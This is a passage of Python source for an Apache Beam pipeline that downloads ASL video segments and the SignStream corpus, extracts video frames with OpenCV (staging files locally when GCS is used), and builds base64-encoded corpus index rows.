    if not fileio.file_path_exists(local_segment_path, d_pl_options)[0]:
        while n_fail < max_fail:
            try:
                # Download entirely into memory, then persist in one write.
                memfile = data_extractor__common.download_to_memfile(segment_url, block_sz=fidscs_globals._1MB, display=False) # returns with memfile.seek(0)
                memfile.seek(0)
                with fileio.open_file_write(local_segment_path) as f:
                    f.write(memfile.getbuffer())
                    f.close()
                print(f"{label+': ' if len(label)>0 else ''}Downloaded {segment_url} to {local_segment_path}")
                memfile.close()
                break
            except Exception as e:
                # Any failure counts toward max_fail; the last failure is only
                # logged (no exception is propagated to the pipeline).
                n_fail += 1
                if n_fail < max_fail:
                    print(f"{label+': ' if len(label)>0 else ''}*** {e} ***: fail count: {n_fail}, max fail: {max_fail} --> sleeping 1 second, then trying again...")
                    time.sleep(fidscs_globals.DOWNLOAD_FAIL_SLEEP_TIME)
                else:
                    print(f"{label+': ' if len(label)>0 else ''}*** {e} ***: fail count: {n_fail}, max fail: {max_fail} --> giving up!")
    else:
        print(f"{label+': ' if len(label)>0 else ''}Found target video ({d_target_vid_seg_download_info['target_video_fname']}) segment {local_segment_path} (downloaded from {segment_url})".format(local_segment_path, segment_url))
    return [d_target_vid_seg_download_info] # passthrough
class VideoSegmentDownloader(beam__common.PipelinePcollElementProcessor):
    """Beam element-processor wrapper that downloads each described video segment."""

    def __init__(self, d_pl_options, label=""):
        handler_kwargs = {'d_pl_options': d_pl_options, 'label': label}
        super().__init__(
            fn_pcoll_element_processor=beam_download_target_video_segment,
            kargs=handler_kwargs,
            return_result=True,
        )
def capture_segment_video(vid_segment_path, truly_local_vid_dir, d_pl_options, debug=False):
    """
    Open a segment video with OpenCV, staging it on the local disk first when
    it lives in GCS (cv2.VideoCapture cannot read GCS paths directly).

    Returns (cv2.VideoCapture, truly_local_target_video_frames_dir) where the
    second element is None unless the segment was staged from GCS.
    """
    video_fname = vid_segment_path.split('/')[-1]
    truly_local_target_video_frames_dir = None
    fs = FileSystems.get_filesystem(vid_segment_path)
    if type(fs) == GCSFileSystem:
        # Copy the GCS blob to a truly-local path so cv2 can open it.
        if debug: print(f"\n\n\tattempting to open video {vid_segment_path} for reading...")
        with fileio.open_file_read(vid_segment_path) as f:
            if debug: print(f"\t\tSUCCESS")
            # now read from local bytes and write to GCS
            buffer = f.read()
            truly_local_vid_segment_path = truly_local_vid_dir+'/'+video_fname
            if debug: print(f"\t\tattempting to write {truly_local_vid_segment_path} (truly) locally...")
            with fileio.open_file_write(truly_local_vid_segment_path) as f_local:
                f_local.write(buffer)
                f_local.close()
            if debug: print(f"\t\t\tSUCCESS")
            f.close()
        vid_segment_path = truly_local_vid_segment_path
        # (truly local) dir for saving frames
        truly_local_target_video_frames_dir = truly_local_vid_dir+'/'+fidscs_globals.STICHED_VIDEO_FRAMES_DIR_NAME+'/'+video_fname.split('.')[0]
        if debug: print(f"\t\t\tattempting to create directory {truly_local_target_video_frames_dir} (truly_local_target_video_frames_dir) for frames extracted from (truly local) video {truly_local_vid_segment_path}...")
        if not fileio.dir_path_exists(truly_local_target_video_frames_dir, d_pl_options)[0]:
            if debug: print(f"\t\t\t\tcreating {truly_local_target_video_frames_dir}...")
            fileio.make_dirs(truly_local_target_video_frames_dir, d_pl_options)
        # Re-check after the mkdir attempt; fail loudly if it still doesn't exist.
        truly_local_target_video_frames_dir_exists = fileio.dir_path_exists(truly_local_target_video_frames_dir, d_pl_options)[0]
        if debug: print(f"\t\t\t\t\t{truly_local_target_video_frames_dir} exists: {truly_local_target_video_frames_dir_exists}")
        if not truly_local_target_video_frames_dir_exists:
            raise Exception(f"required directory truly_local_target_video_frames_dir {truly_local_target_video_frames_dir_exists} does not exist")
    if debug: print(f"\t\t\tattempting to capture (cv2.VideoCapture) video {vid_segment_path})...")
    # finally, capture the video bytes
    return cv2.VideoCapture(vid_segment_path), truly_local_target_video_frames_dir
def write_frame_to_file(frame, index, target_video_frames_dir, truly_local_target_video_frames_dir=None, debug=False):
    """
    Persist one extracted frame as "<index>.jpg" in target_video_frames_dir.

    When truly_local_target_video_frames_dir is given (GCS-backed runs),
    cv2.imwrite targets the truly-local path first and the bytes are then
    copied to the final (possibly remote) path, since cv2 cannot write to
    GCS directly.
    """
    local_frame_path = fileio.path_join(target_video_frames_dir, f"{index}.jpg") # this is the final frame path
    if truly_local_target_video_frames_dir is not None:
        # write truly local frame file
        truly_local_frame_path = truly_local_target_video_frames_dir+'/'+f"{index}.jpg"
        if debug: print(f"\t\t\t\t\t\tattempting to write {truly_local_frame_path} frame...")
        cv2.imwrite(truly_local_frame_path, frame)
        if debug: print(f"\t\t\t\t\t\t\tSUCCESS")
        if debug: print(f"\t\t\t\t\t\t\tattempting to open {truly_local_frame_path} for read...")
        with fileio.open_file_read(truly_local_frame_path) as f_truly_local_frame:
            buffer = f_truly_local_frame.read()
            if debug: print(f"\t\t\t\t\t\t\t\tSUCCESS")
            if debug: print(f"\t\t\t\t\t\t\t\t\tattempting to open {local_frame_path} for final write...")
            with fileio.open_file_write(local_frame_path) as f_frame_final:
                f_frame_final.write(buffer)
                f_frame_final.close()
            if debug: print(f"\t\t\t\t\t\t\t\t\t\tSUCCESS")
            buffer = None
            f_truly_local_frame.close()
    else:
        # Local filesystem: cv2 can write the final path directly.
        if debug: print(f"\t\t\t\t\t\t\t\t\tattempting to open {local_frame_path} for final write...")
        cv2.imwrite(local_frame_path, frame)
        if debug: print(f"\t\t\t\t\t\t\t\t\t\tSUCCESS")
def beam_extract_frames(tpl_target_video_extraction_info, d_pl_options, label="", debug=False):
    """
    Extract (stitch) all frames from a target video's ordered segments.

    expects tpl_target_video_extraction_info: (video_fname, list({'target_video_fname': target_video_fname, 'target_video_frames_dir': target_video_frames_dir, 'segment_url': str(url), 'segment_fname': str(url).split('/')[-1]}))

    Frames are written as sequential "<n>.jpg" files into the shared
    target_video_frames_dir; extraction is skipped when the expected number
    of frames already exists there. Returns
    [(video_fname, n_stitched_frames, segment_dicts)] with each segment dict
    augmented with 'n_frames_extracted'.
    """
    # # log_results = []
    target_video_fname = tpl_target_video_extraction_info[0]
    # Sort segments by filename so frames are stitched in segment order.
    segment_dicts = sorted(tpl_target_video_extraction_info[1], key=lambda segment_dict: segment_dict['segment_fname'])
    target_video_frames_dir = segment_dicts[0]['target_video_frames_dir']
    target_stitched_vid_name = target_video_frames_dir.split(os.path.sep)[-1]
    if not fileio.dir_path_exists(target_video_frames_dir, d_pl_options)[0]:
        fileio.make_dirs(target_video_frames_dir, d_pl_options)
    video_dir = d_pl_options[fidscs_globals.OPT_NAME_VIDEO_DIR]
    local_vid_segment_paths = [fileio.path_join(video_dir, segment_dict['segment_fname']) for segment_dict in segment_dicts]
    for segment_dict in segment_dicts:
        segment_dict['n_frames_extracted'] = 0
    # create local dir for extraction (since OpenCV works only with local file system currently) if we have GCS filesystem
    truly_local_vid_dir = None
    truly_local_vid_dir_suffix = None
    fs = FileSystems.get_filesystem(video_dir)
    if type(fs) == GCSFileSystem:
        truly_local_vid_dir_suffix = '/'.join(video_dir.split('/')[1:])
        truly_local_vid_dir = '/tmp'+truly_local_vid_dir_suffix
        # print(f"\t\tGCS storage detected! Extracting frames to truly_local_vid_dir {truly_local_vid_dir} (and will then upload to GCS after that)...")
        if debug: print(f"\t\t{truly_local_vid_dir} exists: {fileio.dir_path_exists(truly_local_vid_dir, d_pl_options)}")
        if not fileio.dir_path_exists(truly_local_vid_dir, d_pl_options)[0]:
            if debug: print(f"\tcreating {truly_local_vid_dir}...")
            # Create each path component in turn (no recursive mkdir assumed).
            truly_local_vid_dir_path_segs = truly_local_vid_dir.split('/')
            if debug: print(f"\t\ttruly_local_vid_dir_path_segs: {truly_local_vid_dir_path_segs}")
            s_cum_path = ''
            for i, truly_local_vid_dir_path_seg in enumerate(truly_local_vid_dir_path_segs[1:]):
                s_cum_path += '/'+truly_local_vid_dir_path_seg
                fileio.make_dirs(s_cum_path, d_pl_options)
                if debug: print(f"\t\t{s_cum_path} exists: {fileio.dir_path_exists(s_cum_path, d_pl_options)}")
    vc_results = [capture_segment_video(local_vid_segment_path, truly_local_vid_dir, d_pl_options, debug=debug) for local_vid_segment_path in local_vid_segment_paths]
    vid_caps = [vc_result[0] for vc_result in vc_results]
    truly_local_target_video_frames_dirs = [vc_result[1] for vc_result in vc_results]
    for seg_vid_cap in vid_caps:
        seg_vid_cap.set(cv2.CAP_PROP_FPS, fidscs_globals.FPS)
    frame_counts = list(map(lambda vc: int(vc.get(cv2.CAP_PROP_FRAME_COUNT)), vid_caps))
    n_frames_expected = sum(frame_counts)
    failed_target_videos = []
    n_stitched_frames = 0
    if n_frames_expected > 0:
        # get count of existing stitched frames in target_stitched_vid_frames_dir
        n_stitched_frames = len(fileio.list_dir(target_video_frames_dir, d_pl_options))
        b_restitch = n_stitched_frames < n_frames_expected
        n_stitched_frames = 0 if b_restitch else n_stitched_frames
        for i, seg_vid_cap in enumerate(vid_caps):
            segment_dict = segment_dicts[i]
            _n_frames_expected = frame_counts[i]
            if b_restitch:
                success, frame = seg_vid_cap.read()
                n_frames = 0
                while success:
                    write_frame_to_file(
                        frame,
                        n_stitched_frames,
                        target_video_frames_dir,
                        truly_local_target_video_frames_dir=truly_local_target_video_frames_dirs[i],
                        debug=debug
                    )
                    n_frames += 1
                    n_stitched_frames += 1
                    success, frame = seg_vid_cap.read()
                seg_path = local_vid_segment_paths[i]
                seg_fname = seg_path.split(os.path.sep)[-1]
                if n_frames != _n_frames_expected:
                    print(f"{label+': ' if len(label)>0 else ''}{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} Cannot stitch together target video {target_video_fname} since {_n_frames_expected} frames were expected from segment {seg_fname} ({seg_path}) but only {n_frames} were successfully extracted")
                    failed_target_videos.append(target_video_fname)
                    # NOTE(review): 'fail' is assigned but never read anywhere
                    # in this function — failure is conveyed via the print and
                    # failed_target_videos only. Confirm before removing.
                    fail = True
                    break
                else:
                    print(f"{label+': ' if len(label)>0 else ''}Added {n_stitched_frames} frames from segment {seg_fname} for target video {target_video_fname} (stitched-frames dir {target_video_frames_dir})")
            else:
                # Frames already present on disk; trust the expected count.
                n_frames = _n_frames_expected
                print(f"{label+': ' if len(label)>0 else ''}Found existing stiched-frames for {target_stitched_vid_name} ({n_stitched_frames} frames in {target_video_frames_dir})")
            segment_dict['n_frames_extracted'] = n_frames
    else:
        if fidscs_globals.OUTPUT_INFO_LEVEL <= fidscs_globals.OUTPUT_INFO_LEVEL__WARNING:
            print(f"\t{fidscs_globals.VALIDATION_WARNING_TEXT} Cannot stitch together target video {target_video_fname} since cv2.CAP_PROP_FRAME_COUNT reports segments have zero frames")
        failed_target_videos.append(target_video_fname)
        fail = True
    # Clean up truly-local staging dirs created for GCS-backed runs.
    if truly_local_vid_dir is not None:
        for truly_local_target_video_frames_dir in truly_local_target_video_frames_dirs:
            fileio.delete_file(truly_local_target_video_frames_dir, d_pl_options, recursive=True, debug=True)
    return [(tpl_target_video_extraction_info[0], n_stitched_frames, segment_dicts)]
class SegmentFrameExtractor(beam__common.PipelinePcollElementProcessor):
    """Beam element-processor wrapper that stitches frames via beam_extract_frames."""

    def __init__(self, d_pl_options, label="", debug=False):
        handler_kwargs = {'d_pl_options': d_pl_options, 'label': label, 'debug': debug}
        super().__init__(
            fn_pcoll_element_processor=beam_extract_frames,
            kargs=handler_kwargs,
            return_result=True,
        )
def process_corpus_document(corpus_readable_file, d_pl_options, label, ref_CorpusDocumentFileProcessor):
    """
    Read one corpus XML document, base64-encode its (newline-stripped)
    contents, and emit a beam.Row (DocumentID, Filename, XML_B64, LEN).

    DocumentID is taken from (and then advances) the shared counter on
    ref_CorpusDocumentFileProcessor; the source XML file is deleted after
    processing.
    """
    xml_db_path = str(corpus_readable_file.metadata.path)
    xml_db_fname = xml_db_path.split(os.path.sep)[-1].strip()
    # f = beam.io.filesystems.FileSystems.open(xml_db_path)
    f = fileio.open_file_read(xml_db_path)
    # Wrap the byte stream for text-mode reads on Python 3.
    if sys.version_info >= (3,0):
        f = io.TextIOWrapper(f)
    xml_lines_with_cr = f.readlines()
    f.close()
    # encode each row to bytes
    raw_xml_b64 = base64.b64encode("".join([xml_line.replace('\n','').strip() for xml_line in xml_lines_with_cr]).encode('ascii')) # we end up with a string containing the base-64 encoded "characters"
    # debug
    # print(f"length of (base-64 encoded) XML document {xml_db_fname}: {len(raw_xml_b64)}")
    row = beam.Row(
        # SCHEMA_COL_NAMES__CORPUS_DS = [
        #   'DocumentID',
        #   'Filename',
        #   'XML_B64',
        #   'LEN'
        # ]
        DocumentID=int(ref_CorpusDocumentFileProcessor.next_doc_id),
        Filename=xml_db_fname,
        XML_B64=raw_xml_b64,
        LEN=len(raw_xml_b64)
    )
    ref_CorpusDocumentFileProcessor.next_doc_id += 1
    fileio.delete_file(xml_db_path, d_pl_options)
    # if fidscs_globals.OUTPUT_INFO_LEVEL <= fidscs_globals.ERROR:
    print(f"PROCESSED/DELETED corpus document {xml_db_path}") # always show this
    return [row]
class CorpusDocumentFileProcessor(beam__common.PipelinePcollElementProcessor):
    """Beam element-processor wrapper over process_corpus_document.

    Holds the monotonically increasing DocumentID counter (next_doc_id) that
    the processor function reads and advances via the self-reference passed
    in its kwargs.
    """

    def __init__(self, d_pl_options, label=""):
        handler_kwargs = {
            'd_pl_options': d_pl_options,
            'label': label,
            'ref_CorpusDocumentFileProcessor': self,
        }
        super().__init__(
            fn_pcoll_element_processor=process_corpus_document,
            kargs=handler_kwargs,
            return_result=True,
        )
        self.label = label
        self.next_doc_id = 0
# class RowIndexer(beam.DoFn):
# def __init__(self, var_name_prefix):
# self.var_name = var_name_prefix+"_next_id"
# def process(self, element):
# tpl = (fidscs_globals.D_IN_MEMORY_VARS.get(self.var_name, 0), element)
# fidscs_globals.D_IN_MEMORY_VARS[self.var_name] = fidscs_globals.D_IN_MEMORY_VARS.get(self.var_name, 0)+1
# return [tpl]
def decode_XML(corpus_index_schemad_pcoll_row):
    """
    Decode the base64-encoded XML payload of one corpus-index row.

    The XML_B64 column holds the string repr of a python bytes object
    (e.g. "b'PHht...'"), so the leading "b'" and trailing "'" are sliced
    off before base64-decoding.

    Returns a one-element list holding a plain dict:
        {'DocumentID', 'Filename', 'XML', 'LEN'}
    where LEN is the length of the decoded XML text.
    """
    b64_payload = corpus_index_schemad_pcoll_row.XML_B64
    b64_payload = str(b64_payload[2:-1])  # drop the b'...' repr wrapper
    decoded_xml = base64.b64decode(b64_payload.encode('ascii')).decode('ascii').strip()
    return [
        {
            'DocumentID': corpus_index_schemad_pcoll_row.DocumentID,
            'Filename': corpus_index_schemad_pcoll_row.Filename,
            'XML': decoded_xml,
            'LEN': len(decoded_xml)
        }
    ]
class SSXMLDecoder(beam__common.PipelinePcollElementProcessor):
    """Beam element-processor wrapper that base64-decodes corpus XML rows."""

    def __init__(self, d_pl_options, label=""):
        handler_kwargs = {'d_pl_options': d_pl_options, 'label': label}
        super().__init__(
            fn_pcoll_element_processor=decode_XML,
            kargs=handler_kwargs,
            return_result=True,
        )
def assign_to_global__raw_xml_b64_max_len(max_xml_b64_len):
    """Record the corpus-wide max XML_B64 length (plus 4 bytes of slack) in fidscs_globals."""
    padded_len = max_xml_b64_len + 4
    fidscs_globals.MAX_RAW_XML_B64_LEN = padded_len
    # debug
    # print(f"ASSIGNED fidscs_globals.MAX_RAW_XML_B64_LEN={fidscs_globals.MAX_RAW_XML_B64_LEN}")
    return [max_xml_b64_len]
def boostrap_target_video_index(d_vid_indexes_info, d_pl_options):
    """
    Download the video-index archive and extract the selected index CSV.

    d_vid_indexes_info MUST be a dict as follows:
        {
            'vid_indexes_dir': fidscs_globals.VIDEO_INDEXES_DIR,
            'sel_vid_index_path': fidscs_globals.SELECTED_VIDEO_INDEX_PATH,
            'video_indexes_archive': fidscs_globals.VIDEO_INDEXES_ARCHIVE,
            'tmp_dir': fidscs_globals.TMP_DIR,
            'video_ds_path': fidscs_globals.VIDEO_DS_PATH
        }

    Downloads d_vid_indexes_info['video_indexes_archive'] from
    http://www.bu.edu/asllrp/ncslgr-for-download, unzips it in memory, and
    writes only the selected index CSV into
    d_vid_indexes_info['vid_indexes_dir'].

    Returns a one-element list holding d_vid_indexes_info['sel_vid_index_path'].
    """
    if d_pl_options is None or not isinstance(d_pl_options, dict):
        raise ValueError(f"require d_pl_options as dict but got {type(d_pl_options)}")
    remote_archive_path = 'http://www.bu.edu/asllrp/ncslgr-for-download/'+d_vid_indexes_info['video_indexes_archive']
    local_archive_parent_dir = d_vid_indexes_info['tmp_dir']
    # local_archive_path is computed but unused: the archive never touches disk.
    local_archive_path = fileio.path_join(local_archive_parent_dir, d_vid_indexes_info['video_indexes_archive'])
    video_ds_path = d_vid_indexes_info['video_ds_path']
    print(f"VIDEO-INDEX BOOTSTRAP INFO: {d_vid_indexes_info}")
    memfile = data_extractor__common.download_to_memfile(remote_archive_path, block_sz=8192, display=False)
    zip_ref = zipfile.ZipFile(memfile, 'r')
    print(f"unzipping {remote_archive_path} in-memory...")
    # zip_ref.printdir()
    sel_vid_index_path = d_vid_indexes_info['sel_vid_index_path']
    # Archive-relative path of the selected index: "<archive-stem>/<csv-name>".
    sel_vid_index_path_suffix = d_vid_indexes_info['video_indexes_archive'].split('.')[0]+'/'+sel_vid_index_path.split('/')[-1]
    sel_vid_index_fname = sel_vid_index_path_suffix.split('/')[-1]
    # print(f"we need to pull {sel_vid_index_path_suffix} out of in-memory extracted archive")
    bytes_unzipped = zip_ref.read(sel_vid_index_path_suffix)
    zip_ref.close()
    if not fileio.dir_path_exists(d_vid_indexes_info['vid_indexes_dir'], d_pl_options=d_pl_options)[0]:
        fileio.make_dirs(d_vid_indexes_info['vid_indexes_dir'], d_pl_options=d_pl_options)
    with fileio.open_file_write(d_vid_indexes_info['vid_indexes_dir']+'/'+sel_vid_index_fname) as f:
        f.write(bytes_unzipped)
        f.close()
    memfile.close()
    print(f"\tDONE")
    return [d_vid_indexes_info['sel_vid_index_path']]
class TargetVideoIndexBootstrapper(beam__common.PipelinePcollElementProcessor):
    """Beam element-processor wrapper that runs boostrap_target_video_index per element."""

    def __init__(self, d_pl_options):
        handler_kwargs = {'d_pl_options': d_pl_options}
        super().__init__(
            fn_pcoll_element_processor=boostrap_target_video_index,
            kargs=handler_kwargs,
            return_result=True,
        )
def pl__1__bootstrap_target_video_index(pl):
    """
    Pipeline stage 1: produce the schemad target-video-index pcoll.

    Downloads/extracts the selected video-index CSV if it doesn't exist yet
    (otherwise reuses the file on disk), then reads it and applies the
    SCHEMA_COL_NAMES__VIDEO_INDEX schema as beam.Row elements.
    """
    if not fileio.file_path_exists(pl._options._all_options[fidscs_globals.OPT_NAME_SELECTED_VIDEO_INDEX_PATH], pl._options._all_options)[0]:
        sel_vid_index_path = (
            pl
            | "Beam PL: create initial pcoll containing information for boostrap_target_video_index" >> beam.Create(
                [ # one row containing dict of:
                    # 1. url of video indexes archive
                    # 2. local destination (path) for the downloaded archive
                    # 3. local destination (path) which will receive the extracted archive csv files (there are more than one)
                    # 4. final path to the selected videx index csv
                    # (note that the dict is not laid out in the above order)
                    {
                        'vid_indexes_dir': pl._options._all_options[fidscs_globals.OPT_NAME_VIDEO_INDEXES_DIR],
                        'sel_vid_index_path': pl._options._all_options[fidscs_globals.OPT_NAME_SELECTED_VIDEO_INDEX_PATH],
                        'video_indexes_archive': fidscs_globals.VIDEO_INDEXES_ARCHIVE,
                        'tmp_dir': pl._options._all_options[fidscs_globals.OPT_NAME_TMP_DIR],
                        'video_ds_path': pl._options._all_options[fidscs_globals.OPT_NAME_VIDEO_DS_PATH]
                    }
                ]
            )
            # | "Beam PL: bootstrap target video index" >> beam.Map(boostrap_target_video_index) # boostrap_target_video_index outputs SELECTED_VIDEO_INDEX_PATH but beam.Map() wraps this in a pcoll and is fed to...
            | "Beam PL: bootstrap target video index" >> beam.ParDo(TargetVideoIndexBootstrapper(pl._options._all_options)) # boostrap_target_video_index outputs SELECTED_VIDEO_INDEX_PATH but beam.Map() wraps this in a pcoll and is fed to...
        )
    else:
        # Index CSV already on disk: just emit its path (and log the reuse).
        sel_vid_index_path = (
            pl
            | "Beam PL: create initial pcoll containing path to existing sel_vid_index" >> beam.Create([pl._options._all_options[fidscs_globals.OPT_NAME_SELECTED_VIDEO_INDEX_PATH]])
            | "Beam PL: print path to existing sel_vid_index" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="FOUND EXISTING SEL VID INDEX"))
        )
    full_target_vid_index_schemad_pcoll = (
        sel_vid_index_path
        | "Beam PL: read video index into pcoll" >> beam.FlatMap(beam__common.load_vid_index_csv)
        | "Beam PL: apply schema to video index pcoll" >> beam.Map(
            lambda x: beam.Row(
                # URL-quote the filename since it becomes part of storage paths.
                target_video_filename=str(urllib.parse.quote(x[fidscs_globals.SCHEMA_COL_NAMES__VIDEO_INDEX[0]])),
                video_seq_id=int(x[fidscs_globals.SCHEMA_COL_NAMES__VIDEO_INDEX[1]]),
                perspective_cam_id=int(x[fidscs_globals.SCHEMA_COL_NAMES__VIDEO_INDEX[2]]),
                compressed_mov_url=str(x[fidscs_globals.SCHEMA_COL_NAMES__VIDEO_INDEX[3]]),
                uncompressed_avi_url=str(x[fidscs_globals.SCHEMA_COL_NAMES__VIDEO_INDEX[4]]),
                uncompressed_avi_mirror_1_url=str(x[fidscs_globals.SCHEMA_COL_NAMES__VIDEO_INDEX[5]]),
                uncompressed_avi_mirror_2_url=str(x[fidscs_globals.SCHEMA_COL_NAMES__VIDEO_INDEX[6]])
            )
        )
    )
    return full_target_vid_index_schemad_pcoll
def pl__2__write_target_vid_index_csv(full_target_vid_index_schemad_pcoll, d_pl_options):
    """
    Pipeline stage 2: persist the target-video index as a CSV (once).

    Sorts the schemad pcoll, re-applies the schema (sorting loses it),
    serializes rows to CSV strings, and delegates the write to
    beam__common.pl__X__write_pcoll_to_csv. If the CSV already exists the
    write is skipped and [vid_index_path] is returned instead.
    """
    vid_index_path = fileio.path_join(d_pl_options[fidscs_globals.OPT_NAME_DATA_DIR], fidscs_globals.VIDEO_INDEX_BASE+'.csv')
    if not fileio.file_path_exists(vid_index_path, d_pl_options)[0]:
        sorted_full_target_vid_index_schemad_pcoll = beam__common.pl__X__sort_pcoll(full_target_vid_index_schemad_pcoll, pcoll_label="full_target_vid_index")
        sorted_corpus_index_csv_rows_pcoll = (
            sorted_full_target_vid_index_schemad_pcoll
            | "Beam PL: re-apply schema to sorted_full_target_vid_index" >> beam.Map(lambda sorted_full_target_vid_index_schemad_pcoll_row: beam.Row(
                    target_video_filename=sorted_full_target_vid_index_schemad_pcoll_row.target_video_filename,
                    video_seq_id=sorted_full_target_vid_index_schemad_pcoll_row.video_seq_id,
                    perspective_cam_id=sorted_full_target_vid_index_schemad_pcoll_row.perspective_cam_id,
                    compressed_mov_url=sorted_full_target_vid_index_schemad_pcoll_row.compressed_mov_url,
                    uncompressed_avi_url=sorted_full_target_vid_index_schemad_pcoll_row.uncompressed_avi_url,
                    uncompressed_avi_mirror_1_url=sorted_full_target_vid_index_schemad_pcoll_row.uncompressed_avi_mirror_1_url,
                    uncompressed_avi_mirror_2_url=sorted_full_target_vid_index_schemad_pcoll_row.uncompressed_avi_mirror_2_url
                )
            )
            | beam.Map(lambda sorted_full_target_vid_index_schemad_pcoll_row: beam__common.beam_row_to_csv_string(sorted_full_target_vid_index_schemad_pcoll_row))
        )
        return beam__common.pl__X__write_pcoll_to_csv(
            sorted_corpus_index_csv_rows_pcoll,
            "TARGET-VIDEO-INDEX",
            fidscs_globals.VIDEO_INDEXES_ARCHIVE,
            fidscs_globals.SCHEMA_COL_NAMES__VIDEO_INDEX,
            d_pl_options
        )
    else:
        print(f"FOUND EXISTING VID INDEX: {vid_index_path}")
        return [vid_index_path]
def pl__2__filter_target_vid_index(full_target_vid_index_schemad_pcoll, d_pl_options):
    """
    Pipeline stage 2: cap the video-index pcoll at MAX_TARGET_VIDEOS entries.

    Delegates the actual subsetting to beam__common.pl__X__subset_pcoll.
    """
    # ******************** filter schemad target video index pcoll as desired (if necessary) using beam.transforms.sql.SqlTransform(), for example limiting size of pcoll data items to fidscs_globals.MAX_TARGET_VIDEOS: BEGIN ********************
    max_target_videos = d_pl_options[fidscs_globals.OPT_NAME_MAX_TARGET_VIDEOS]
    return beam__common.pl__X__subset_pcoll(full_target_vid_index_schemad_pcoll, "full_target_vid_index_schemad_pcoll", max_target_videos, d_pl_options)
    # ******************** filter schemad video index pcoll as desired (if necessary) using beam.transforms.sql.SqlTransform(), for example limiting size of pcoll data items to fidscs_globals.MAX_TARGET_VIDEOS: END ********************
def pl__1__bootstrap_corpus_index(pl):
  """
  Bootstrap the SignStream corpus documents.

  If any expected corpus document (per fidscs_globals.CORPUS_DOC_FILE_PATH_SUFFIXES)
  is missing under the pipeline tmp dir, download and extract all docs from the
  corpus archive via SignstreamCorpusBootstrapper; otherwise just emit the glob
  path to the already-extracted documents.

  Returns:
    A pcoll of beam.Row(corpus_docs_dir=<path (or glob) to corpus docs>).
  """
  # ******************** bootstrap SignStream corpus: BEGIN ********************
  not_all_exist = False
  for doc_file_suffix in fidscs_globals.CORPUS_DOC_FILE_PATH_SUFFIXES:
    doc_file_path = fileio.path_join(pl._options._all_options[fidscs_globals.OPT_NAME_TMP_DIR], doc_file_suffix)
    if not fileio.file_path_exists(doc_file_path, pl._options._all_options)[0]:
      not_all_exist = True
      print(f"MISSING A CORPUS DOC ({doc_file_path}) - DOWNLOADING AND EXTRACTING ALL FROM ARCHIVE")
      break
    else:
      print(f"FOUND EXISTING CORPUS DOC: {doc_file_path}")
  corpus_docs_path_pcoll = None
  if not_all_exist:
    corpus_docs_path_pcoll = (
      pl
      | "Beam PL: create initial pcoll containing information for boostrap_signstream_corpus" >> beam.Create(
          [
            {
              'tmp_dir': pl._options._all_options[fidscs_globals.OPT_NAME_TMP_DIR],
              'corpus_archive': fidscs_globals.CORPUS_ARCHIVE
            }
          ]
        )
      # SignstreamCorpusBootstrapper outputs [fileio.path_join(d_corpus_info['tmp_dir'], d_corpus_info['corpus_archive'].split('.')[0])] if datasets do not yet exist, otherwise []
      | "Beam PL: bootstrap SignStream corpus" >> beam.ParDo(SignstreamCorpusBootstrapper(pl._options._all_options))
    )
  else:
    corpus_docs_path_pcoll = (
      pl
      | "Beam PL: create initial pcoll contain path to corpus docs" >> beam.Create(
          [
            fileio.path_join(
              fileio.path_join(
                pl._options._all_options[fidscs_globals.OPT_NAME_TMP_DIR],
                fidscs_globals.CORPUS_ARCHIVE.split('.')[0]
              ),
              "*"
            )
          ]
        )
      # BUGFIX: the "apply schema..." Map was previously ALSO applied here, which
      # (a) reused the same transform label as the application below — Beam rejects
      # duplicate labels in one pipeline — and (b) wrapped the value in beam.Row twice.
      # The schema is now applied exactly once, below, for BOTH branches.
    )
  return (
    corpus_docs_path_pcoll
    | "Beam PL: apply schema to corpus document files path pcoll" >> beam.Map(lambda x: beam.Row(corpus_docs_dir=str(x)))
  )
  # ******************** bootstrap SignStream corpus: END ********************
def pl__1__corpus_document_file_structure_to_corpus_index(pl):
  """
  Match and read every extracted corpus document under <tmp dir>/<archive stem>
  and emit one corpus-index row per document via CorpusDocumentFileProcessor.
  """
  corpus_docs_dir = fileio.path_join(
    pl._options._all_options[fidscs_globals.OPT_NAME_TMP_DIR],
    fidscs_globals.CORPUS_ARCHIVE.split('.')[0]
  )
  corpus_docs_glob = fileio.path_join(corpus_docs_dir, "*")
  return (
    pl
    | "Beam PL: get corpus documents" >> beam.io.fileio.MatchFiles(corpus_docs_glob)
    | "Beam PL: read corpus documents" >> beam.io.fileio.ReadMatches()  # pcoll of fileio.ReadableFile objects
    | "Beam PL: create corpus index dataset" >> beam.ParDo(CorpusDocumentFileProcessor(pl._options._all_options))
  )  # corpus_index_schemad_pcoll
def pl__2__write_corpus_index_csv(corpus_index_schemad_pcoll, global_var_value_assigner__raw_xml_b64_max_len, d_pl_options):
  """
  Sort the corpus index, write it to csv, and compute the max base-64 XML length.

  Three things happen here:
    1. the schema'd corpus-index rows are flattened to tuples, sorted, re-schema'd,
       serialized to csv strings, and written out ("CORPUS-INDEX" csv);
    2. the maximum LEN (length of the b64-encoded XML) across all rows is computed
       with a global CombineGlobally and assigned to a global var via the supplied
       global_var_value_assigner__raw_xml_b64_max_len ParDo;
    3. both results are indexed and merged with CoGroupByKey.

  Returns:
    combined_corpus_index_csv_path_and_max_xml_b64_len_indexed — the CoGroupByKey
    merge of {'corpus_index_csv_path': ..., 'max_len': ...}.
  """
  # flatten each schema'd row to a plain tuple so it can be sorted
  corpus_index_pcoll = (
    corpus_index_schemad_pcoll
    | "Beam PL: extract (<corpus doc id>, <corpus doc filename>, <xml (base-64)>, <length of xml (base-64)>)" >> beam.Map(
        lambda corpus_index_schemad_pcoll_row:
          # row = beam.Row(
          #   # SCHEMA_COL_NAMES__CORPUS_DS = [
          #   #   'DocumentID',
          #   #   'Filename',
          #   #   'XML_B64',
          #   #   'LEN'
          #   # ]
          #   DocumentID=int(self.next_doc_id),
          #   Filename=xml_db_fname,
          #   XML_B64=raw_xml_b64,
          #   LEN=len(raw_xml_b64)
          # )
          (
            corpus_index_schemad_pcoll_row.DocumentID,
            corpus_index_schemad_pcoll_row.Filename,
            corpus_index_schemad_pcoll_row.XML_B64,
            corpus_index_schemad_pcoll_row.LEN
          )
      )
  )
  sorted_corpus_index_pcoll = beam__common.pl__X__sort_pcoll(corpus_index_pcoll, pcoll_label="corpus_index")
  sorted_corpus_index_csv_rows_pcoll = (
    sorted_corpus_index_pcoll
    | "Beam PL: re-apply schema to sorted_corpus_index" >> beam.Map(
        lambda sorted_corpus_index_pcoll_row: beam.Row(
          DocumentID=sorted_corpus_index_pcoll_row[0],
